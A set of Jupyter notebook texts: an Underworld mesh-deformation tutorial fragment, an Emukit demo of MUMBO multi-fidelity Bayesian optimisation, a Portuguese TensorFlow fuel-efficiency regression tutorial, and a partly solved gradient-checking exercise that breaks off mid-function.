``maxCoord``). ``` mesh2 = uw.mesh.FeMesh_Cartesian( elementType = ("Q2/dpc1"), elementRes = (4, 4), minCoord = (0., 0.), maxCoord = (2., 1.)) figMesh2 = glucifer.Figure(figsize=(1200,600)) figMesh2.append( glucifer.objects.Mesh(mesh2.subMesh, nodeNumbers=True) ) figMesh2.append( glucifer.objects.Mesh(mesh2, nodeNumbers=True, segmentsPerEdge=4) ) figMesh2.show() # The mesh data for the 2nd element type can be accessed via the `mesh.subMesh`. print(' Number of mesh points (Total) = {0:2d}'.format(len(mesh2.data))) print(' Number of submesh points = {0:2d}'.format(len(mesh2.subMesh.data))) ``` ## Deforming the mesh By default the mesh data is read only. The following cell will unlock the mesh and displace a single node of the mesh in the positive x direction. ``` with mesh.deform_mesh(): mesh.data[40][0] += 0.025 figMesh.show() ``` Deforming meshes allows us to increase resolution where it is needed most. For example at the top of the simulation domain by redefining the vertical mesh coordinate to be $z := \sqrt{z}$ ``` mesh.reset() # restore the mesh to the original configuration specified by elementType with mesh.deform_mesh(): for index, coord in enumerate(mesh.data): mesh.data[index][1] = mesh.data[index][1]**0.5 figMesh.show() ``` ## Saving and loading meshes Mesh coordinate data can be saved in hdf5 format using the ``save`` method attached to the ``mesh`` class. The following line will save the mesh to a file. ``` mesh.save('deformedMesh.h5') ``` To check that this has worked we will re-create the mesh, plot and then reload the saved mesh. ``` mesh = uw.mesh.FeMesh_Cartesian( elementType = ("Q1"), elementRes = (8, 8), minCoord = (0.0, 0.0), maxCoord = (2.0, 1.0)) figMesh = glucifer.Figure(figsize=(1200,600)) figMesh.append( glucifer.objects.Mesh(mesh, nodeNumbers=True) ) figMesh.show() ``` Now load the mesh and display: ``` mesh.load('deformedMesh.h5') figMesh.show() ```
github_jupyter
# Demo of MUMBO for multi-fidelity Bayesian Optimisation This notebook provides a demo of the MUlti-task Max-value Bayesian Optimisation (MUMBO) acquisition function of Moss et al [2020]. https://arxiv.org/abs/2006.12093 MUMBO provides the high perfoming optimization of other entropy-based acquisitions. However, unlike the standard entropy-search for multi-fidelity optimization, MUMBO requires a fraction of the computational cost. MUMBO is a multi-fidelity (or multi-task) extension of max-value entropy search also availible in Emukit. Our implementation of MUMBO is controlled by two parameters: "num_samples" and "grid_size". "num_samples" controls how many mote-carlo samples we use to calculate entropy reductions. As we only approximate a 1-d integral, "num_samples" does not need to be large or be increased for problems with large d (unlike standard entropy-search). We recomend values between 5-15. "grid_size" controls the coarseness of the grid used to approximate the distribution of our max value and so must increase with d. We recommend 10,000*d. Note that as the grid must only be calculated once per BO step, the choice of "grid_size" does not have a large impact on computation time. ``` ### General imports %matplotlib inline import numpy as np import matplotlib.pyplot as plt from matplotlib import colors as mcolors import GPy import time np.random.seed(12345) ### Emukit imports from emukit.test_functions.forrester import multi_fidelity_forrester_function from emukit.core.loop.user_function import UserFunctionWrapper from emukit.multi_fidelity.convert_lists_to_array import convert_x_list_to_array from emukit.bayesian_optimization.acquisitions.entropy_search import MultiInformationSourceEntropySearch from emukit.bayesian_optimization.acquisitions.max_value_entropy_search import MUMBO from emukit.core.acquisition import Acquisition from emukit.multi_fidelity.models.linear_model import GPyLinearMultiFidelityModel from emukit.multi_fidelity.kernels.linear_multi_fidelity_kernel import LinearMultiFidelityKernel from emukit.multi_fidelity.convert_lists_to_array import convert_xy_lists_to_arrays from emukit.core import ParameterSpace, ContinuousParameter, InformationSourceParameter from emukit.model_wrappers import GPyMultiOutputWrapper from GPy.models.gp_regression import GPRegression ### --- Figure config LEGEND_SIZE = 15 ``` Set up our toy problem (1D optimisation of the forrester function with two fidelity levels) and collect 6 initial points at low fidelity and 3 at high fidelitly. ``` # Load function # The multi-fidelity Forrester function is already wrapped as an Emukit UserFunction object in # the test_functions package forrester_fcn, _ = multi_fidelity_forrester_function() forrester_fcn_low = forrester_fcn.f[0] forrester_fcn_high = forrester_fcn.f[1] # Assign costs low_fidelity_cost = 1 high_fidelity_cost = 10 # Plot the function s x_plot = np.linspace(0, 1, 200)[:, None] y_plot_low = forrester_fcn_low(x_plot) y_plot_high = forrester_fcn_high(x_plot) plt.plot(x_plot, y_plot_low, 'b') plt.plot(x_plot, y_plot_high, 'r') plt.legend(['Low fidelity', 'High fidelity']) plt.xlim(0, 1) plt.title('High and low fidelity Forrester functions') plt.xlabel('x') plt.ylabel('y'); # Collect and plot initial samples np.random.seed(123) x_low = np.random.rand(6)[:, None] x_high = x_low[:3] y_low = forrester_fcn_low(x_low) y_high = forrester_fcn_high(x_high) plt.scatter(x_low,y_low) plt.scatter(x_high,y_high) ``` Fit our linear multi-fidelity GP model to the observed data. ``` x_array, y_array = convert_xy_lists_to_arrays([x_low, x_high], [y_low, y_high]) kern_low = GPy.kern.RBF(1) kern_low.lengthscale.constrain_bounded(0.01, 0.5) kern_err = GPy.kern.RBF(1) kern_err.lengthscale.constrain_bounded(0.01, 0.5) multi_fidelity_kernel = LinearMultiFidelityKernel([kern_low, kern_err]) gpy_model = GPyLinearMultiFidelityModel(x_array, y_array, multi_fidelity_kernel, 2) gpy_model.likelihood.Gaussian_noise.fix(0.1) gpy_model.likelihood.Gaussian_noise_1.fix(0.1) model = GPyMultiOutputWrapper(gpy_model, 2, 5, verbose_optimization=False) model.optimize() ``` Define acqusition functions for multi-fidelity problems ``` # Define cost of different fidelities as acquisition function class Cost(Acquisition): def __init__(self, costs): self.costs = costs def evaluate(self, x): fidelity_index = x[:, -1].astype(int) x_cost = np.array([self.costs[i] for i in fidelity_index]) return x_cost[:, None] @property def has_gradients(self): return True def evaluate_with_gradients(self, x): return self.evalute(x), np.zeros(x.shape) parameter_space = ParameterSpace([ContinuousParameter('x', 0, 1), InformationSourceParameter(2)]) cost_acquisition = Cost([low_fidelity_cost, high_fidelity_cost]) es_acquisition = MultiInformationSourceEntropySearch(model, parameter_space) / cost_acquisition mumbo_acquisition = MUMBO(model, parameter_space, num_samples=5, grid_size=500) / cost_acquisition ``` Lets plot the resulting acqusition functions (MUMBO and standard entropy search for multi-fidelity BO) for the chosen model on the collected data. Note that MES takes a fraction of the time of ES to compute (plotted on a log scale). This difference becomes even more apparent as you increase the dimensions of the sample space. ``` x_plot_low = np.concatenate([np.atleast_2d(x_plot), np.zeros((x_plot.shape[0], 1))], axis=1) x_plot_high = np.concatenate([np.atleast_2d(x_plot), np.ones((x_plot.shape[0], 1))], axis=1) t_0=time.time() es_plot_low = es_acquisition.evaluate(x_plot_low) es_plot_high = es_acquisition.evaluate(x_plot_high) t_es=time.time()-t_0 mumbo_plot_low = mumbo_acquisition.evaluate(x_plot_low) mumbo_plot_high = mumbo_acquisition.evaluate(x_plot_high) t_mumbo=time.time()-t_es-t_0 fig, (ax1, ax2) = plt.subplots(1, 2) ax1.plot(x_plot, es_plot_low , "blue") ax1.plot(x_plot, es_plot_high, "red") ax1.set_title("Multi-fidelity Entropy Search") ax1.set_xlabel(r"$x$") ax1.set_ylabel(r"$\alpha(x)$") ax1.set_xlim(0, 1) ax2.plot(x_plot, mumbo_plot_low , "blue", label="Low fidelity evaluations") ax2.plot(x_plot, mumbo_plot_high , "red",label="High fidelity evaluations") ax2.legend(loc="upper right") ax2.set_title("MUMBO") ax2.set_xlabel(r"$x$") ax2.set_ylabel(r"$\alpha(x)$") ax2.set_xlim(0, 1) plt.tight_layout() plt.figure() plt.bar(["es","MUMBO"],[t_es,t_mumbo]) plt.xlabel("Acquisition Choice") plt.yscale('log') plt.ylabel("Calculation Time (secs)") ```
github_jupyter
##### Copyright 2019 The TensorFlow Authors. ``` #@title Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #@title MIT License # # Copyright (c) 2017 François Chollet # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. ``` # Regressão: preveja consumo de combustível <table class="tfo-notebook-buttons" align="left"> <td> <a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs/blob/master/site/pt/r1/tutorials/keras/basic_regression"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Execute em Google Colab</a> </td> <td> <a target="_blank" href="https://github.com/tensorflow/docs/blob/master/site/pt/r1/tutorials/keras//basic_regression"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />Veja a fonte em GitHub</a> </td> </table> Note: A nossa comunidade TensorFlow traduziu estes documentos. Como as traduções da comunidade são *o melhor esforço*, não há garantias de que sejam uma reflexão exata e atualizada da [documentação oficial em Inglês](https://www.tensorflow.org/?hl=en). Se tem alguma sugestão para melhorar esta tradução, por favor envie um pull request para o repositório do GitHub [tensorflow/docs](https://github.com/tensorflow/docs). Para se voluntariar para escrever ou rever as traduções da comunidade, contacte a [lista docs@tensorflow.org](https://groups.google.com/a/tensorflow.org/forum/#!forum/docs). Em um problema de regressão, o objetivo é prever as saídas (*outputs*) de um valor contínuo, como um preço ou probabilidade. Em contraste de problemas de classificação, onde temos o propósito de escolher uma classe em uma lista de classificações (por exemplo, se uma imagem contém uma maçã ou laranja, assim reconhecendo qual fruta é representada na imagem). Este *notebook* usa a clássica base de dados [Auto MPG](https://archive.ics.uci.edu/ml/datasets/auto+mpg) e constrói um modelo para prever a economia de combustíveis de automóveis do final dos anos 1970, início dos anos 1980. Para isso, forneceremos um modelo com descrição de vários automóveis desse período. Essa descrição inclui atributos como: cilindros, deslocamento, potência do motor, e peso. Este exemplo usa a API `tf.keras`. Veja [este guia](https://www.tensorflow.org/r1/guide/keras) para mais detalhes. ``` # Use seaborn para pairplot !pip install seaborn from __future__ import absolute_import, division, print_function, unicode_literals import pathlib import matplotlib.pyplot as plt import pandas as pd import seaborn as sns import tensorflow as tf from tensorflow import keras from tensorflow.keras import layers print(tf.__version__) ``` ## Base de dados Auto MPG A base de dados está disponível em [UCI Machine Learning Repository](https://archive.ics.uci.edu/ml/). ### Pegando os dados Primeiro baixe a base de dados dos automóveis. ``` dataset_path = keras.utils.get_file("auto-mpg.data", "http://archive.ics.uci.edu/ml/machine-learning-databases/auto-mpg/auto-mpg.data") dataset_path ``` Utilizando o pandas, impoorte os dados: ``` column_names = ['MPG','Cylinders','Displacement','Horsepower','Weight', 'Acceleration', 'Model Year', 'Origin'] raw_dataset = pd.read_csv(dataset_path, names=column_names, na_values = "?", comment='\t', sep=" ", skipinitialspace=True) dataset = raw_dataset.copy() dataset.tail() ``` ### Limpe os dados Esta base contém alguns valores não conhecidos (*unknown*). ``` dataset.isna().sum() ``` Para manter esse tutorial básico, remova as linhas com esses valores não conhecidos. ``` dataset = dataset.dropna() ``` A coluna "Origin" é uma coluna categórica e não numérica. Logo converta para *one-hot* : ``` origin = dataset.pop('Origin') dataset['USA'] = (origin == 1)*1.0 dataset['Europe'] = (origin == 2)*1.0 dataset['Japan'] = (origin == 3)*1.0 dataset.tail() ``` ### Separando dados de treinamento e teste Agora separe os dados em um conjunto de treinamento e outro teste. Iremos utilizar o de conjunto de teste no final da análise do model. ``` train_dataset = dataset.sample(frac=0.8,random_state=0) test_dataset = dataset.drop(train_dataset.index) ``` ### Inspecione o dado Dê uma rápida olhada em como está a distribuição de algumas colunas do conjunto de treinamento. ``` sns.pairplot(train_dataset[["MPG", "Cylinders", "Displacement", "Weight"]], diag_kind="kde") ``` Repare na visão geral dos estatísticas: ``` train_stats = train_dataset.describe() train_stats.pop("MPG") train_stats = train_stats.transpose() train_stats ``` ### Separe features de labels Separe o valor alvo (*labels*), das *features*. Essa label é o valor no qual o modelo é treinado para prever. ``` train_labels = train_dataset.pop('MPG') test_labels = test_dataset.pop('MPG') ``` ### Normalize os dados Observe novamente o `train_stats` acima e note quão diferente são os intervalos de uma feature e outra. Uma boa prática é normalizar as *features* que usam diferentes escalas e intervalos. Apesar do modelo poder convergir sem a normalização, isso torna o treinamento mais difícil, e torna o resultado do modelo dependente da escolha das unidades da entrada. Observação: embora geramos intencionalmente essas estatísticas para os dados de treinamento, essas estatísticas serão usadas também para normalizar o conjunto de teste. Precisamos delinear o conjunto de teste na mesma distribuição que o modelo foi treinado. ``` def norm(x): return (x - train_stats['mean']) / train_stats['std'] normed_train_data = norm(train_dataset) normed_test_data = norm(test_dataset) ``` Esse dado normalizado é o que usaremos para treinar o modelo. Atenção: As estatísticas usadas para normalizar as entradas aqui (média e desvio padrão) precisa ser aplicada em qualquer outro dado que alimenta o modelo, junto com o código *one-hot* que fizemos anteriormente. Isso inclui o conjunto de teste e os dados que o modelo usará em produção. ## O Modelo ### Construindo o modelo Vamos construir o modelo. Aqui usaremos o modelo `Sequential` com duas camadas *densely connected*, e a camada de saída que retorna um único valor contínuo. Os passos de construção do modelo são agrupados em uma função, build_model, já que criaremos um segundo modelo mais tarde. ``` def build_model(): model = keras.Sequential([ layers.Dense(64, activation=tf.nn.relu, input_shape=[len(train_dataset.keys())]), layers.Dense(64, activation=tf.nn.relu), layers.Dense(1) ]) optimizer = tf.keras.optimizers.RMSprop(0.001) model.compile(loss='mean_squared_error', optimizer=optimizer, metrics=['mean_absolute_error', 'mean_squared_error']) return model model = build_model() ``` ## Examine o modelo Use o método `.summary` para exibir uma descrição simples do modelo. ``` model.summary() ``` Agora teste o modelo. Pegue um batch de de 10 exemplos do conjunto de treinamento e chame `model.predict`nestes. ``` example_batch = normed_train_data[:10] example_result = model.predict(example_batch) example_result ``` Parece que está funcionando e ele produz o resultado de forma e tipo esperados. ### Treinando o modelo Treine o modelo com 1000 *epochs*, e grave a acurácia do treinamento e da validação em um objeto `history`. ``` # Mostra o progresso do treinamento imprimindo um único ponto para cada epoch completada class PrintDot(keras.callbacks.Callback): def on_epoch_end(self, epoch, logs): if epoch % 100 == 0: print('') print('.', end='') EPOCHS = 1000 history = model.fit( normed_train_data, train_labels, epochs=EPOCHS, validation_split = 0.2, verbose=0, callbacks=[PrintDot()]) ``` Visualize o progresso do modelo de treinamento usando o estados armazenados no objeto `history` ``` hist = pd.DataFrame(history.history) hist['epoch'] = history.epoch hist.tail() def plot_history(history): hist = pd.DataFrame(history.history) hist['epoch'] = history.epoch plt.figure() plt.xlabel('Epoch') plt.ylabel('Mean Abs Error [MPG]') plt.plot(hist['epoch'], hist['mean_absolute_error'], label='Train Error') plt.plot(hist['epoch'], hist['val_mean_absolute_error'], label = 'Val Error') plt.ylim([0,5]) plt.legend() plt.figure() plt.xlabel('Epoch') plt.ylabel('Mean Square Error [$MPG^2$]') plt.plot(hist['epoch'], hist['mean_squared_error'], label='Train Error') plt.plot(hist['epoch'], hist['val_mean_squared_error'], label = 'Val Error') plt.ylim([0,20]) plt.legend() plt.show() plot_history(history) ``` Este grafo mostra as pequenas melhoras, ou mesmo a diminuição do `validation error` após 100 *epochs*. Vamos atualizar o `model.fit` para que pare automatixamente o treinamento quando o `validation score` não aumentar mais. Usaremos o `EarlyStopping callback` que testa a condição do treinamento a cada `epoch`. Se um grupo de `epochs` decorre sem mostrar melhoras, o treinamento irá parar automaticamente. Você pode aprender mais sobre este callback [aqui](https://www.tensorflow.org/api_docs/python/tf/keras/callbacks/EarlyStopping) ``` model = build_model() # The patience parameter is the amount of epochs to check for improvement early_stop = keras.callbacks.EarlyStopping(monitor='val_loss', patience=10) history = model.fit(normed_train_data, train_labels, epochs=EPOCHS, validation_split = 0.2, verbose=0, callbacks=[early_stop, PrintDot()]) plot_history(history) ``` O gráfico mostra que no conjunto de validação, a média de erro é próximo de +/- 2MPG. Isso é bom? Deixaremos essa decisão a você. Vamos ver quão bem o modelo generaliza usando o conjunto de **teste**, que não usamos para treinar o modelo. Isso diz quão bem podemos esperar que o modelo se saia quando usarmos na vida real. ``` loss, mae, mse = model.evaluate(normed_test_data, test_labels, verbose=0) print("Testing set Mean Abs Error: {:5.2f} MPG".format(mae)) ``` ### Make predictions Finalmente, prevejamos os valores MPG usando o conjunto de teste. ``` test_predictions = model.predict(normed_test_data).flatten() plt.scatter(test_labels, test_predictions) plt.xlabel('True Values [MPG]') plt.ylabel('Predictions [MPG]') plt.axis('equal') plt.axis('square') plt.xlim([0,plt.xlim()[1]]) plt.ylim([0,plt.ylim()[1]]) _ = plt.plot([-100, 100], [-100, 100]) ``` Parece que o nosso modelo prediz razoavelmente bem. Vamos dar uma olhada na distribuição dos erros. ``` error = test_predictions - test_labels plt.hist(error, bins = 25) plt.xlabel("Prediction Error [MPG]") _ = plt.ylabel("Count") ``` Não é tão gaussiana, porém podemos esperar que por conta do número de exemplo é bem pequeno. ## Conclusão Este notebook introduz algumas técnicas para trabalhar com problema de regressão. * Mean Sqaured Error(MSE), é uma função comum de *loss* usada para problemas de regressão (diferentes funçẽso de *loss* são usadas para problemas de classificação). * Similarmente, as métricas de evolução usadas na regressão são diferentes da classificação. Uma métrica comum de regressão é Mean Absolute Error (MAE). * Quando o dado de entrada de *features* tem diferentes intervalos, cada *feature* deve ser escalada para o mesmo intervalo. * Se não possui muitos dados de treinamento, uma técnica é preferir uma pequena rede com poucas camadas para evitar *overfitting*. * *Early stopping* é uma boa técnica para evitar *overfitting*.
github_jupyter
# Gradient Checking Welcome to the final assignment for this week! In this assignment you will learn to implement and use __gradient checking__. You are part of a team working to make mobile payments available globally, and are asked to build a deep learning model to detect __fraud__--whenever someone makes a payment, you want to see if the payment might be fraudulent, such as if the user's account has been taken over by a hacker. But `backpropagation` is quite challenging to implement, and sometimes has bugs. Because this is a mission-critical application, your company's CEO wants to be really certain that your implementation of backpropagation is correct. Your CEO says, "Give me a proof that your backpropagation is actually working!" To give this reassurance, you are going to use "gradient checking". Let's do it! __Contents:__ 1. How does gradient checking work? 2. 1-dimensional gradient checking 3. N-dimensional gradient checking ``` # Packages import numpy as np from testCases import * from gc_utils import sigmoid, relu, dictionary_to_vector, vector_to_dictionary, gradients_to_vector ``` ## 1) How does gradient checking work? __Backpropagation__ computes the gradients $\frac{\partial J}{\partial \theta}$, where: - $\theta$ denotes the parameters of the model. - $J$ is computed using `forward propagation` and your `loss` function. Because `forward propagation` is relatively easy to implement, you're confident you got that right, and so you're almost 100% sure that you're computing the cost $J$ correctly. Thus, you can use your code for computing $J$ to verify the code for computing $\frac{\partial J}{\partial \theta}$. Let's look back at the definition of a __derivative (or gradient)__: $$ \frac{\partial J}{\partial \theta} = \lim_{\varepsilon \to 0} \frac{J(\theta + \varepsilon) - J(\theta - \varepsilon)}{2 \varepsilon} \tag{1}$$ If you're not familiar with the "$\displaystyle \lim_{\varepsilon \to 0}$" notation, it's just a way of saying ___"when $\varepsilon$ is really really small."___ We know the following: - $\frac{\partial J}{\partial \theta}$ is what you want to make sure you're computing correctly. - You can compute $J(\theta + \varepsilon)$ and $J(\theta - \varepsilon)$ (in the case that $\theta$ is a real number), since you're confident your implementation for $J$ is correct. Lets use equation (1) and a small value for $\varepsilon$ to convince your CEO that your code for computing $\frac{\partial J}{\partial \theta}$ is correct! ## 2) 1-dimensional gradient checking Consider a 1D linear function $J(\theta) = \theta x$. The model contains only a _single real-valued_ parameter $\theta$, and takes $x$ as input. You will implement code to compute $J(.)$ and its derivative $\frac{\partial J}{\partial \theta}$. You will then use gradient checking to make sure your derivative computation for $J$ is correct. <img src="images/1Dgrad_kiank.png" style="width:600px;height:250px;"> <caption><center> <u> **Figure 1** </u>: **1D linear model**<br> </center></caption> The diagram above shows the key computation steps: 1. First start with $x$, then evaluate the function $J(x)$ ("forward propagation"). 2. Then compute the derivative $\frac{\partial J}{\partial \theta}$ ("backward propagation"). **Exercise**: implement "`forward propagation`" and "`backward propagation`" for this simple function. I.e., compute both $J(.)$ ("forward propagation") and its derivative with respect to $\theta$ ("backward propagation"), in two separate functions. ``` def forward_propagation(x, theta): """ Implement the linear forward propagation (compute J) presented in Figure 1 (J(theta) = theta * x) Arguments: - x -- a real-valued input - theta -- our parameter, a real number as well Return: - J -- the value of function J, computed using the formula J(theta) = theta * x """ ### START CODE HERE ### (approx. 1 line) J = theta * x ### END CODE HERE ### return J x, theta = 2, 4 J = forward_propagation(x, theta) print ("J = " + str(J)) ``` **Expected Output**: <table style=> <tr> <td> ** J ** </td> <td> 8</td> </tr> </table> **Exercise**: Now, implement the backward propagation step (derivative computation) of Figure 1. That is, compute the derivative of $J(\theta) = \theta x$ with respect to $\theta$. To save you from doing the calculus, you should get $dtheta = \frac { \partial J }{ \partial \theta} = x$. ``` # GRADED FUNCTION: backward_propagation def backward_propagation(x, theta): """ Computes the derivative of J with respect to theta (see Figure 1). Arguments: - x -- a real-valued input - theta -- our parameter, a real number as well Returns: - dtheta -- the gradient of the cost with respect to theta """ ### START CODE HERE ### (approx. 1 line) dtheta = x ### END CODE HERE ### return dtheta x, theta = 2, 4 dtheta = backward_propagation(x, theta) print ("dtheta = " + str(dtheta)) ``` **Expected Output**: <table> <tr> <td> ** dtheta ** </td> <td> 2 </td> </tr> </table> **Exercise**: To show that the `backward_propagation()` function is correctly computing the gradient $\frac{\partial J}{\partial \theta}$, let's implement gradient checking. **Instructions**: - First compute "gradapprox" using the formula above (1) and a small value of $\varepsilon$. Here are the Steps to follow: 1. $\theta^{+} = \theta + \varepsilon$ 2. $\theta^{-} = \theta - \varepsilon$ 3. $J^{+} = J(\theta^{+})$ 4. $J^{-} = J(\theta^{-})$ 5. $gradapprox = \frac{J^{+} - J^{-}}{2 \varepsilon}$ - Then compute the gradient using backward propagation, and store the result in a variable "grad" - Finally, compute the relative difference between "gradapprox" and the "grad" using the following formula: $$ difference = \frac {\mid\mid grad - gradapprox \mid\mid_2}{\mid\mid grad \mid\mid_2 + \mid\mid gradapprox \mid\mid_2} \tag{2}$$ You will need 3 Steps to compute this formula: - 1'. compute the numerator using `np.linalg.norm(...)` - 2'. compute the denominator. You will need to call `np.linalg.norm(...)` twice. - 3'. divide them. - If this difference is small (say less than $10^{-7}$), you can be quite confident that you have computed your gradient correctly. Otherwise, there may be a mistake in the gradient computation. ``` # GRADED FUNCTION: gradient_check def gradient_check(x, theta, epsilon = 1e-7): """ Implement the backward propagation presented in Figure 1. Arguments: x -- a real-valued input theta -- our parameter, a real number as well epsilon -- tiny shift to the input to compute approximated gradient with formula(1) Returns: difference -- difference (2) between the approximated gradient and the backward propagation gradient """ # Compute gradapprox using left side of formula (1). epsilon is small enough, you don't need to worry about the limit. ### START CODE HERE ### (approx. 5 lines) thetaplus = theta + epsilon # Step 1 thetaminus = theta - epsilon # Step 2 J_plus = forward_propagation(x, thetaplus) # Step 3 J_minus = forward_propagation(x, thetaminus) # Step 4 gradapprox = (J_plus - J_minus)/(2*epsilon) # Step 5 ### END CODE HERE ### # Check if gradapprox is close enough to the output of backward_propagation() ### START CODE HERE ### (approx. 1 line) grad = backward_propagation (x, theta) ### END CODE HERE ### ### START CODE HERE ### (approx. 1 line) numerator = np.linalg.norm(grad - gradapprox) # Step 1' denominator = np.linalg.norm(grad) + np.linalg.norm(gradapprox) # Step 2' difference = numerator / denominator # Step 3' ### END CODE HERE ### if difference < 1e-7: print ("The gradient is correct!") else: print ("The gradient is wrong!") return difference x, theta = 2, 4 difference = gradient_check(x, theta) print("difference = " + str(difference)) ``` **Expected Output**: The gradient is correct! <table> <tr> <td> ** difference ** </td> <td> 2.9193358103083e-10 </td> </tr> </table> Congrats, the difference is smaller than the $10^{-7}$ threshold. So you can have high confidence that you've correctly computed the gradient in `backward_propagation()`. Now, in the more general case, your cost function $J$ has more than a single 1D input. When you are training a neural network, $\theta$ actually consists of multiple matrices $W^{[l]}$ and biases $b^{[l]}$! It is important to know how to do a gradient check with higher-dimensional inputs. Let's do it! ## 3) N-dimensional gradient checking The following figure describes the forward and backward propagation of your fraud detection model. <img src="images/NDgrad_kiank.png" style="width:600px;height:400px;"> <caption><center> <u> **Figure 2** </u>: **deep neural network**<br>*LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID*</center></caption> Let's look at your implementations for forward propagation and backward propagation. ``` def forward_propagation_n(X, Y, parameters): """ Implements the forward propagation (and computes the cost) presented in Figure 3. Arguments: X -- training set for m examples Y -- labels for m examples parameters -- python dictionary containing your parameters "W1", "b1", "W2", "b2", "W3", "b3": W1 -- weight matrix of shape (5, 4) b1 -- bias vector of shape (5, 1) W2 -- weight matrix of shape (3, 5) b2 -- bias vector of shape (3, 1) W3 -- weight matrix of shape (1, 3) b3 -- bias vector of shape (1, 1) Returns: cost -- the cost function (logistic cost for one example) """ # retrieve parameters m = X.shape[1] W1 = parameters["W1"] b1 = parameters["b1"] W2 = parameters["W2"] b2 = parameters["b2"] W3 = parameters["W3"] b3 = parameters["b3"] # LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID Z1 = np.dot(W1, X) + b1 A1 = relu(Z1) Z2 = np.dot(W2, A1) + b2 A2 = relu(Z2) Z3 = np.dot(W3, A2) + b3 A3 = sigmoid(Z3) # Cost logprobs = np.multiply(-np.log(A3),Y) + np.multiply(-np.log(1 - A3), 1 - Y) cost = 1./m * np.sum(logprobs) cache = (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3) return cost, cache ``` Now, run backward propagation. ``` def backward_propagation_n(X, Y, cache): """ Implement the backward propagation presented in figure 2. Arguments: X -- input datapoint, of shape (input size, 1) Y -- true "label" cache -- cache output from forward_propagation_n() Returns: gradients -- A dictionary with the gradients of the cost with respect to each parameter, activation and pre-activation variables. """ m = X.shape[1] (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3) = cache dZ3 = A3 - Y dW3 = 1./m * np.dot(dZ3, A2.T) db3 = 1./m * np.sum(dZ3, axis=1, keepdims = True) dA2 = np.dot(W3.T, dZ3) dZ2 = np.multiply(dA2, np.int64(A2 > 0)) # dW2 = 1./m * np.dot(dZ2, A1.T) * 2 dW2 = 1./m * np.dot(dZ2, A1.T) db2 = 1./m * np.sum(dZ2, axis=1, keepdims = True) dA1 = np.dot(W2.T, dZ2) dZ1 = np.multiply(dA1, np.int64(A1 > 0)) dW1 = 1./m * np.dot(dZ1, X.T) # db1 = 4./m * np.sum(dZ1, axis=1, keepdims = True) db1 = 1./m * np.sum(dZ1, axis=1, keepdims = True) gradients = {"dZ3": dZ3, "dW3": dW3, "db3": db3, "dA2": dA2, "dZ2": dZ2, "dW2": dW2, "db2": db2, "dA1": dA1, "dZ1": dZ1, "dW1": dW1, "db1": db1} return gradients ``` You obtained some results on the fraud detection test set but you are not 100% sure of your model. Nobody's perfect! Let's implement gradient checking to verify if your gradients are correct. **How does gradient checking work?**. As in 1) and 2), you want to compare "gradapprox" to the gradient computed by backpropagation. The formula is still: $$ \frac{\partial J}{\partial \theta} = \lim_{\varepsilon \to 0} \frac{J(\theta + \varepsilon) - J(\theta - \varepsilon)}{2 \varepsilon} \tag{1}$$ However, $\theta$ is not a scalar anymore. It is a dictionary called "parameters". We implemented a function "`dictionary_to_vector()`" for you. It converts the "parameters" dictionary into a vector called "values", obtained by reshaping all parameters (W1, b1, W2, b2, W3, b3) into vectors and concatenating them. The inverse function is "`vector_to_dictionary`" which outputs back the "parameters" dictionary. <img src="images/dictionary_to_vector.png" style="width:600px;height:400px;"> <caption><center> <u> **Figure 2** </u>: **dictionary_to_vector() and vector_to_dictionary()**<br> You will need these functions in gradient_check_n()</center></caption> We have also converted the "gradients" dictionary into a vector "grad" using gradients_to_vector(). You don't need to worry about that. **Exercise**: Implement gradient_check_n(). **Instructions**: Here is pseudo-code that will help you implement the gradient check. For each i in num_parameters: - To compute `J_plus[i]`: 1. Set $\theta^{+}$ to `np.copy(parameters_values)` 2. Set $\theta^{+}_i$ to $\theta^{+}_i + \varepsilon$ 3. Calculate $J^{+}_i$ using to `forward_propagation_n(x, y, vector_to_dictionary(`$\theta^{+}$ `))`. - To compute `J_minus[i]`: do the same thing with $\theta^{-}$ - Compute $gradapprox[i] = \frac{J^{+}_i - J^{-}_i}{2 \varepsilon}$ Thus, you get a vector gradapprox, where gradapprox[i] is an approximation of the gradient with respect to `parameter_values[i]`. You can now compare this gradapprox vector to the gradients vector from backpropagation. Just like for the 1D case (Steps 1', 2', 3'), compute: $$ difference = \frac {\| grad - gradapprox \|_2}{\| grad \|_2 + \| gradapprox \|_2 } \tag{3}$$ ``` # GRADED FUNCTION: gradient_check_n def gradient_check_n(parameters, gradients, X, Y, epsilon = 1e-7): """ Checks if backward_propagation_n computes correctly the gradient of the cost output by forward_propagation_n Arguments: parameters -- python dictionary containing your parameters "W1", "b1", "W2", "b2", "W3", "b3": grad -- output of backward_propagation_n, contains gradients of the cost with respect to the parameters. x -- input datapoint, of shape (input size, 1) y -- true "label" epsilon -- tiny shift to the input to compute approximated gradient with formula(1) Returns: difference -- difference (2) between the approximated gradient and the backward propagation gradient """ # Set-up variables parameters_values, _ = dictionary_to_vector(parameters) grad = 